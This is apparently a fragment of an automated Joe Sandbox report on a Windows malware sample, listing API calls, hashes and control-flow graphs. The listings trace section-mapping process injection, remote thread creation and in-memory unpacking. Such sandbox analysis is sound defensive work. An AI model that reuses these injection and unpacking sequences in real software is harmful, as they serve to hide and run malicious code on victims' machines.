                            • Instruction ID: f390e3d0f4c9bd654050140e8d70974a6db2ab88ea7c37a64fdc5b7086b4af87
                            • Opcode Fuzzy Hash: fb15b2d9d84d8bcf95237442851c33c9a576287e722d5cdf4983b928f5d9cc64
                            • Instruction Fuzzy Hash: 24E07227DC33200F87700ECDB0D60086F97B6B03233B60FAACA80333588B328C010288
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f051c0fcd709177014542cd0273e44ec655c7c60457a6c32fe43c7d43ebeaafc
                            • Instruction ID: c4400a266d698cb3cd2bf7b5ca235fa4f1f280859f6ddc9359233ff16ff34d52
                            • Opcode Fuzzy Hash: f051c0fcd709177014542cd0273e44ec655c7c60457a6c32fe43c7d43ebeaafc
                            • Instruction Fuzzy Hash: B6A00249D125A384C524C50436C041C1A81305ED107689F05D180D9405F348C4C61043
                            APIs
                            • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,0042840C), ref: 004236AD
                            • OpenJobObjectA.KERNEL32(00000000,00000000,00428418), ref: 004236BA
                            • GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 004236C9
                            • Sleep.KERNEL32(00000000), ref: 004236D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768787533.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_416000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: CalendarInfoNameObjectOpenPathShortSleep
                            • String ID: -
                            • API String ID: 3454512315-2547889144
                            • Opcode ID: 51237ded8cffff5c661eebe9a307697b28ab80f9e6e32791c6b23dd8faaea119
                            • Instruction ID: deacb889439696245f735b3f4471453babfeec7347a63c5168fd63d97d027ef3
                            • Opcode Fuzzy Hash: 51237ded8cffff5c661eebe9a307697b28ab80f9e6e32791c6b23dd8faaea119
                            • Instruction Fuzzy Hash: 7921A771A00128EBC7319F15EC859AE7778EB85715F4080ADE659A7241C73C4A86CF6C
                            APIs
                            • GetModuleHandleW.KERNEL32(0043A3B0), ref: 00423551
                            • GetProcAddress.KERNEL32(00000000,0042C638), ref: 0042358E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768787533.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_416000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: $VirtualProtect
                            • API String ID: 1646373207-947944765
                            • Opcode ID: 44762ff7a82ffd8c5c1d5e0c0204e9bd3952b0c34b1168cc3fd0d8398fe7d883
                            • Instruction ID: d0582955cadd0fc5f4b94350803a6a31df697eece703d4cb31990996f5db6057
                            • Opcode Fuzzy Hash: 44762ff7a82ffd8c5c1d5e0c0204e9bd3952b0c34b1168cc3fd0d8398fe7d883
                            • Instruction Fuzzy Hash: 8E31531569C3C0D8E331CBA8BC857297B62AB15B14F54347AD9848B2F1D3FA056A836F
                            APIs
                            • GetFullPathNameW.KERNEL32(0042844C,00000000,?,00000000), ref: 00423744
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00423760
                            • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 0042377E
                            • SetFileShortNameA.KERNEL32(00000000,00428480), ref: 0042378A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768787533.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_416000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: Name$CreateEnvironmentFileFreeFullHeapPathShortStrings
                            • String ID:
                            • API String ID: 4071102102-0
                            • Opcode ID: 741c1bccab81f8b294f72623694b2b6f52fb331087fe6a6da8c1225e30d228ee
                            • Instruction ID: 4f65d5ff727ea9b5f32b9490f161a63e31010cc474a4420f8d895bd29f22500d
                            • Opcode Fuzzy Hash: 741c1bccab81f8b294f72623694b2b6f52fb331087fe6a6da8c1225e30d228ee
                            • Instruction Fuzzy Hash: B101B1B1704124AFCB20AF69BC89D6B77BCE78971AB80503FF501D2150DA3C1945CB6E
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768787533.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_416000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction ID: 79eb0d46623e3e840f5a8a74d676871430ce86260699b964cc8067b3add82cac
                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction Fuzzy Hash: 8A117232600159BBCF225E84EC01CEE3F62FB59754B998416FA1955130C63ACAB2AB89

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:24.6%
                            Signature Coverage:0%
                            Total number of Nodes:134
                            Total number of Limit Nodes:5
                            execution_graph 5243 423b60 5244 423b6a __cfltcvt_init 5243->5244 5247 4246c7 GetModuleHandleA 5244->5247 5246 423b6f __setdefaultprecision 5248 4246d6 GetProcAddress 5247->5248 5249 424689 5247->5249 5248->5249 5249->5246 5187 6d092b GetPEB 5188 6d0972 5187->5188 5189 401906 5190 40191c 5189->5190 5191 401941 Sleep 5190->5191 5192 40195c 5191->5192 5193 401513 7 API calls 5192->5193 5194 40196d 5192->5194 5193->5194 5126 403149 5127 403150 5126->5127 5128 4030fe RtlCreateUserThread NtTerminateProcess 5127->5128 5130 403157 5127->5130 5129 40312a 5128->5129 5131 6fbc42 5134 6fbc48 5131->5134 5135 6fbc57 5134->5135 5138 6fc3e8 5135->5138 5139 6fc403 5138->5139 5140 6fc40c CreateToolhelp32Snapshot 5139->5140 5141 6fc428 Module32First 5139->5141 5140->5139 5140->5141 5142 6fc437 5141->5142 5144 6fbc47 5141->5144 5145 6fc0a7 5142->5145 5146 6fc0d2 5145->5146 5147 6fc11b 5146->5147 5148 6fc0e3 VirtualAlloc 5146->5148 5147->5147 5148->5147 5149 402e8e 5151 402e86 5149->5151 5152 402f1f 5151->5152 5153 4018fa 5151->5153 5154 40190a 5153->5154 5155 401941 Sleep 5154->5155 5156 40195c 5155->5156 5158 40196d 5156->5158 5159 401513 5156->5159 5158->5152 5160 401522 5159->5160 5161 4015c1 NtDuplicateObject 5160->5161 5168 4016dd 5160->5168 5162 4015de NtCreateSection 5161->5162 5161->5168 5163 401604 NtMapViewOfSection 5162->5163 5164 40165e NtCreateSection 5162->5164 5163->5164 5165 401627 NtMapViewOfSection 5163->5165 5166 40168a 5164->5166 5164->5168 5165->5164 5167 401645 5165->5167 5166->5168 5169 401694 NtMapViewOfSection 5166->5169 5167->5164 5168->5158 5169->5168 5170 4016bb NtMapViewOfSection 5169->5170 5170->5168 5051 6d003c 5052 6d0049 5051->5052 5064 6d0e0f SetErrorMode SetErrorMode 5052->5064 5057 6d0265 5058 6d02ce VirtualProtect 5057->5058 5060 6d030b 5058->5060 5059 6d0439 VirtualFree 5063 6d04be LoadLibraryA 5059->5063 5060->5059 5062 6d08c7 5063->5062 5065 6d0223 5064->5065 5066 6d0d90 5065->5066 5067 6d0dad 5066->5067 5068 6d0dbb GetPEB 5067->5068 5069 6d0238 VirtualAlloc 5067->5069 5068->5069 5069->5057 5070 423af0 5073 42379f 5070->5073 5072 423af5 5074 4237af 5073->5074 5075 42381f GetLogicalDriveStringsW DeleteVolumeMountPointW GetCommandLineA 5074->5075 5076 42383d 5074->5076 5075->5074 5077 42384a 11 API calls 5076->5077 5078 423948 5076->5078 5081 423902 GetDefaultCommConfigA DebugBreak EnumDateFormatsW 5077->5081 5079 42394a SetCommMask GetTickCount GetSystemTimes 5078->5079 5082 42397d 5078->5082 5079->5078 5080 42397f 5079->5080 5080->5082 5083 423988 FoldStringW 5080->5083 5084 42392a 5081->5084 5085 4239a0 OpenWaitableTimerA HeapLock FormatMessageW 5082->5085 5086 423a41 GlobalAlloc 5082->5086 5083->5082 5084->5078 5095 4239ec 5085->5095 5087 423a86 LoadLibraryA 5086->5087 5088 423a5f 5086->5088 5096 423485 5087->5096 5088->5087 5092 423a9b 5101 42370a 5092->5101 5094 423aa0 5094->5072 5095->5086 5097 4234c4 5096->5097 5098 4234d0 GetModuleHandleW GetProcAddress 5097->5098 5099 4235a6 5097->5099 5098->5097 5100 423467 VirtualProtect 5099->5100 5100->5092 5102 423736 GetFullPathNameW 5101->5102 5103 42374a 5101->5103 5102->5103 5112 4235e6 5103->5112 5106 423766 5115 423635 5106->5115 5107 42375f FreeEnvironmentStringsW 5107->5106 5110 423790 5110->5094 5111 42377b HeapCreate SetFileShortNameA 5111->5110 5113 42360a GetCommProperties LoadLibraryA 5112->5113 5114 42361e 5112->5114 5113->5114 5114->5106 5114->5107 5118 423664 5115->5118 5116 4236e4 5116->5110 5116->5111 5118->5116 5119 4236a5 SetCalendarInfoW OpenJobObjectA GetShortPathNameA Sleep 5118->5119 5120 42362a 5118->5120 5119->5118 5123 4235a9 5120->5123 5124 4235c5 VirtualUnlock 5123->5124 5125 4235cf 5123->5125 5124->5125 5125->5118 5250 402fd3 5251 40312a 5250->5251 5252 402ffd 5250->5252 5252->5251 5253 4030fe RtlCreateUserThread NtTerminateProcess 5252->5253 5253->5251 5239 402e35 5241 402e6f 5239->5241 5240 402f1f 5241->5240 5242 4018fa 8 API calls 5241->5242 5242->5240 5171 6fbc37 5172 6fbc3b 5171->5172 5173 6fbc60 5172->5173 5174 6fc3e8 3 API calls 5172->5174 5174->5173 5201 40151e 5202 40154c 5201->5202 5203 4016dd 5202->5203 5204 4015c1 NtDuplicateObject 5202->5204 5204->5203 5205 4015de NtCreateSection 5204->5205 5206 401604 NtMapViewOfSection 5205->5206 5207 40165e NtCreateSection 5205->5207 5206->5207 5208 401627 NtMapViewOfSection 5206->5208 5207->5203 5209 40168a 5207->5209 5208->5207 5210 401645 5208->5210 5209->5203 5211 401694 NtMapViewOfSection 5209->5211 5210->5207 5211->5203 5212 4016bb NtMapViewOfSection 5211->5212 5212->5203

                            Control-flow Graph

                            APIs
                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00423821
                            • DeleteVolumeMountPointW.KERNEL32(00000000), ref: 00423828
                            • GetCommandLineA.KERNEL32 ref: 0042382E
                            • lstrcatW.KERNEL32(?,00000000), ref: 00423853
                            • InterlockedExchange.KERNEL32(?,00000000), ref: 0042385F
                            • GetActiveWindow.USER32 ref: 00423865
                            • GetSystemWindowsDirectoryW.KERNEL32(?,00000000), ref: 00423874
                            • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0042388A
                            • IntersectRect.USER32(?,?,00000000), ref: 0042389B
                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 004238A4
                            • GetAtomNameA.KERNEL32(00000000,?,00000000), ref: 004238B4
                            • GlobalDeleteAtom.KERNEL32(00000000), ref: 004238BB
                            • GetCurrentConsoleFont.KERNEL32(00000000,00000000,?), ref: 004238C8
                            • SearchPathA.KERNEL32(0042852C,00428518,004284E4,00000000,?,?), ref: 004238EB
                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 0042390C
                            • DebugBreak.KERNEL32 ref: 00423912
                            • EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 0042391B
                            • SetCommMask.KERNELBASE(00000000,00000000), ref: 0042394C
                            • GetTickCount.KERNEL32 ref: 00423952
                            • GetSystemTimes.KERNELBASE(?,?,?), ref: 00423967
                            • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0042398D
                            • OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 004239AF
                            • HeapLock.KERNEL32(00000000), ref: 004239B6
                            • FormatMessageW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004239CA
                            • GlobalAlloc.KERNELBASE(00000000), ref: 00423A48
                            • LoadLibraryA.KERNELBASE(00428574), ref: 00423A8B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060637436.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_416000_ashcvvs.jbxd
                            Similarity
                            • API ID: AtomCommConsoleDeleteGlobalSystem$ActiveAllocBreakCacheCommandConfigCountCurrentDateDebugDefaultDirectoryDriveEnumExchangeFlushFoldFontFormatFormatsHeapInstructionInterlockedIntersectLibraryLineLoadLockLogicalMaskMessageMountNameOpenPathPointRectSearchStringStringsTickTimerTimesVolumeWaitableWindowWindowsWritelstrcat
                            • String ID: VirtualProtect$}$
                            • API String ID: 693232001-3575559497
                            • Opcode ID: 458ea9c994ca7e43693011cce1549fc3b33e6df546367350751d41966682c02c
                            • Instruction ID: 8dbc5d9f7ccbc57e8f3c20c9d260084f9863f046cce8ff7655e10ccfc7c1cc5d
                            • Opcode Fuzzy Hash: 458ea9c994ca7e43693011cce1549fc3b33e6df546367350751d41966682c02c
                            • Instruction Fuzzy Hash: B8819072606130AFC721AF61EC49C9F7BACEF4A355B80443AF585D2161DB3C4646CBAE

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 145 401513-401546 152 401555 145->152 153 40154c-40156b call 401196 145->153 152->153 157 401570-401575 153->157 158 40156d 153->158 160 40157b-40158c 157->160 161 40189d-4018a5 157->161 158->157 164 401592-4015bb 160->164 165 40189b-4018bf 160->165 161->157 164->165 173 4015c1-4015d8 NtDuplicateObject 164->173 169 4018b0-4018bb 165->169 170 4018c2-4018d4 165->170 169->170 174 4018d7 170->174 175 4018ca-4018d0 170->175 173->165 176 4015de-401602 NtCreateSection 173->176 177 4018eb 174->177 178 4018df-4018f7 call 401196 174->178 175->174 179 401604-401625 NtMapViewOfSection 176->179 180 40165e-401684 NtCreateSection 176->180 177->178 179->180 182 401627-401643 NtMapViewOfSection 179->182 180->165 184 40168a-40168e 180->184 182->180 185 401645-40165b 182->185 184->165 187 401694-4016b5 NtMapViewOfSection 184->187 185->180 187->165 188 4016bb-4016d7 NtMapViewOfSection 187->188 188->165 190 4016dd call 4016e2 188->190
                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
                            • Instruction ID: ebc0160933c68a8b7ae7f1ca7eda0dd03739b2ad6b995580a9f4ea7b057fd4c7
                            • Opcode Fuzzy Hash: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
                            • Instruction Fuzzy Hash: AB616171600204FBEB209F95DC49FAF7BB8EF85B00F14412AFA12BA1E4D7759A01DB25

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 192 40151e-40156b call 401196 197 401570-401575 192->197 198 40156d 192->198 200 40157b-40158c 197->200 201 40189d-4018a5 197->201 198->197 204 401592-4015bb 200->204 205 40189b-4018bf 200->205 201->197 204->205 213 4015c1-4015d8 NtDuplicateObject 204->213 209 4018b0-4018bb 205->209 210 4018c2-4018d4 205->210 209->210 214 4018d7 210->214 215 4018ca-4018d0 210->215 213->205 216 4015de-401602 NtCreateSection 213->216 217 4018eb 214->217 218 4018df-4018f7 call 401196 214->218 215->214 219 401604-401625 NtMapViewOfSection 216->219 220 40165e-401684 NtCreateSection 216->220 217->218 219->220 222 401627-401643 NtMapViewOfSection 219->222 220->205 224 40168a-40168e 220->224 222->220 225 401645-40165b 222->225 224->205 227 401694-4016b5 NtMapViewOfSection 224->227 225->220 227->205 228 4016bb-4016d7 NtMapViewOfSection 227->228 228->205 230 4016dd call 4016e2 228->230
                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
                            • Instruction ID: 81614cc47252d4ee750cd10e5f363bec598540b14c8849c2392ba6a7819565d6
                            • Opcode Fuzzy Hash: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
                            • Instruction Fuzzy Hash: 8B5137B1900248BFEF209F91CC49FEFBBB8EF85B00F144159FA11BA2A5D6759905CB24

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 232 401553-40156b call 401196 238 401570-401575 232->238 239 40156d 232->239 241 40157b-40158c 238->241 242 40189d-4018a5 238->242 239->238 245 401592-4015bb 241->245 246 40189b-4018bf 241->246 242->238 245->246 254 4015c1-4015d8 NtDuplicateObject 245->254 250 4018b0-4018bb 246->250 251 4018c2-4018d4 246->251 250->251 255 4018d7 251->255 256 4018ca-4018d0 251->256 254->246 257 4015de-401602 NtCreateSection 254->257 258 4018eb 255->258 259 4018df-4018f7 call 401196 255->259 256->255 260 401604-401625 NtMapViewOfSection 257->260 261 40165e-401684 NtCreateSection 257->261 258->259 260->261 263 401627-401643 NtMapViewOfSection 260->263 261->246 265 40168a-40168e 261->265 263->261 266 401645-40165b 263->266 265->246 268 401694-4016b5 NtMapViewOfSection 265->268 266->261 268->246 269 4016bb-4016d7 NtMapViewOfSection 268->269 269->246 271 4016dd call 4016e2 269->271
                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
                            • Instruction ID: d0bd6428bf20664bceabbb55207a57fb76a02318494b8c1f9a1cb2173d989cf6
                            • Opcode Fuzzy Hash: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
                            • Instruction Fuzzy Hash: 565128B1900249BBEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D7719941CB24

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 273 402fd3-402ff7 274 40312a-40312f 273->274 275 402ffd-403015 273->275 275->274 276 40301b-40302c 275->276 277 40302e-403037 276->277 278 40303c-40304a 277->278 278->278 279 40304c-403053 278->279 280 403075-40307c 279->280 281 403055-403074 279->281 282 40309e-4030a1 280->282 283 40307e-40309d 280->283 281->280 284 4030a3-4030a6 282->284 285 4030aa 282->285 283->282 284->285 287 4030a8 284->287 285->277 286 4030ac-4030b1 285->286 286->274 288 4030b3-4030b6 286->288 287->286 288->274 289 4030b8-403127 RtlCreateUserThread NtTerminateProcess 288->289 289->274
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: CreateProcessTerminateThreadUser
                            • String ID:
                            • API String ID: 1921587553-0
                            • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                            • Instruction ID: c5f1771b03d6f6f48bc893f8c69e4bd59083146a95f7f1e574921d9c63f51eee
                            • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                            • Instruction Fuzzy Hash: 9A412631218E088FD768EE6CA84576277D5FB98311F6643AAE809D3389FE34DC1183C9

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 291 403149-40314e 292 403150-403151 291->292 293 403152-403156 291->293 292->293 294 403157-403172 293->294 295 4030fe-403127 RtlCreateUserThread NtTerminateProcess 293->295 299 403174 294->299 296 40312a-40312f 295->296 300 403176 299->300 301 40317d-403182 299->301 300->301 304 403178 300->304 302 403184 301->302 303 40318a-403192 call 40120f 301->303 302->303 305 403186-403189 302->305 303->299 308 403196-4031ac 303->308 304->301 305->303 311 4031b0 308->311 311->311
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
                            • Instruction ID: 15e76b100028984b8ee99d2dec5c44828c89a921298bb6101f651bfb9f41234e
                            • Opcode Fuzzy Hash: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
                            • Instruction Fuzzy Hash: 6F0128315186048BE7285E799886226BFA5EF18337F28037FD122E87D1E13E8707964F

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 6d003c-6d0047 61 6d004c-6d0263 call 6d0a3f call 6d0e0f call 6d0d90 VirtualAlloc 60->61 62 6d0049 60->62 77 6d028b-6d0292 61->77 78 6d0265-6d0289 call 6d0a69 61->78 62->61 80 6d02a1-6d02b0 77->80 82 6d02ce-6d03c2 VirtualProtect call 6d0cce call 6d0ce7 78->82 80->82 83 6d02b2-6d02cc 80->83 89 6d03d1-6d03e0 82->89 83->80 90 6d0439-6d04b8 VirtualFree 89->90 91 6d03e2-6d0437 call 6d0ce7 89->91 93 6d04be-6d04cd 90->93 94 6d05f4-6d05fe 90->94 91->89 96 6d04d3-6d04dd 93->96 97 6d077f-6d0789 94->97 98 6d0604-6d060d 94->98 96->94 100 6d04e3-6d0505 96->100 101 6d078b-6d07a3 97->101 102 6d07a6-6d07b0 97->102 98->97 103 6d0613-6d0637 98->103 112 6d0517-6d0520 100->112 113 6d0507-6d0515 100->113 101->102 104 6d086e-6d08be LoadLibraryA 102->104 105 6d07b6-6d07cb 102->105 106 6d063e-6d0648 103->106 111 6d08c7-6d08f9 104->111 108 6d07d2-6d07d5 105->108 106->97 109 6d064e-6d065a 106->109 114 6d0824-6d0833 108->114 115 6d07d7-6d07e0 108->115 109->97 110 6d0660-6d066a 109->110 116 6d067a-6d0689 110->116 118 6d08fb-6d0901 111->118 119 6d0902-6d091d 111->119 120 6d0526-6d0547 112->120 113->120 117 6d0839-6d083c 114->117 121 6d07e4-6d0822 115->121 122 6d07e2 115->122 123 6d068f-6d06b2 116->123 124 6d0750-6d077a 116->124 117->104 125 6d083e-6d0847 117->125 118->119 126 6d054d-6d0550 120->126 121->108 122->114 129 6d06ef-6d06fc 123->129 130 6d06b4-6d06ed 123->130 124->106 131 6d0849 125->131 132 6d084b-6d086c 125->132 127 6d0556-6d056b 126->127 128 6d05e0-6d05ef 126->128 134 6d056d 127->134 135 6d056f-6d057a 127->135 128->96 136 6d06fe-6d0748 129->136 137 6d074b 129->137 130->129 131->104 132->117 134->128 138 6d057c-6d0599 135->138 139 6d059b-6d05bb 135->139 136->137 137->116 144 6d05bd-6d05db 138->144 139->144 144->126
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006D024D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060795194.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_6d0000_ashcvvs.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID: cess$kernel32.dll
                            • API String ID: 4275171209-1230238691
                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                            • Instruction ID: 5ebbe460fe37c58c253ed573dd18450252dbf76ec07c608bcbb3694c3860dc94
                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                            • Instruction Fuzzy Hash: 23525874E012299FDB64CF58C985BA8BBB1BF09304F1480DAE94DAB351DB30AA95DF14

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 312 6fc3e8-6fc401 313 6fc403-6fc405 312->313 314 6fc40c-6fc418 CreateToolhelp32Snapshot 313->314 315 6fc407 313->315 316 6fc41a-6fc420 314->316 317 6fc428-6fc435 Module32First 314->317 315->314 316->317 322 6fc422-6fc426 316->322 318 6fc43e-6fc446 317->318 319 6fc437-6fc438 call 6fc0a7 317->319 323 6fc43d 319->323 322->313 322->317 323->318
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006FC410
                            • Module32First.KERNEL32(00000000,00000224), ref: 006FC430
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060868077.00000000006F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 006F9000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_6f9000_ashcvvs.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFirstModule32SnapshotToolhelp32
                            • String ID:
                            • API String ID: 3833638111-0
                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                            • Instruction ID: 096d592d9de0d3ca72be8c1fd2eb845cbabe018a147b545c6b69286852a077a8
                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                            • Instruction Fuzzy Hash: 0FF0C23210031CABD7203BB8AD9DABE76EAAF98330F100128E742D11C0CB70E8054661

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 325 6d0e0f-6d0e24 SetErrorMode * 2 326 6d0e2b-6d0e2c 325->326 327 6d0e26 325->327 327->326
                            APIs
                            • SetErrorMode.KERNELBASE(00000400,?,?,006D0223,?,?), ref: 006D0E19
                            • SetErrorMode.KERNELBASE(00000000,?,?,006D0223,?,?), ref: 006D0E1E
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060795194.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                            Joe Sandbox IDA Plugin
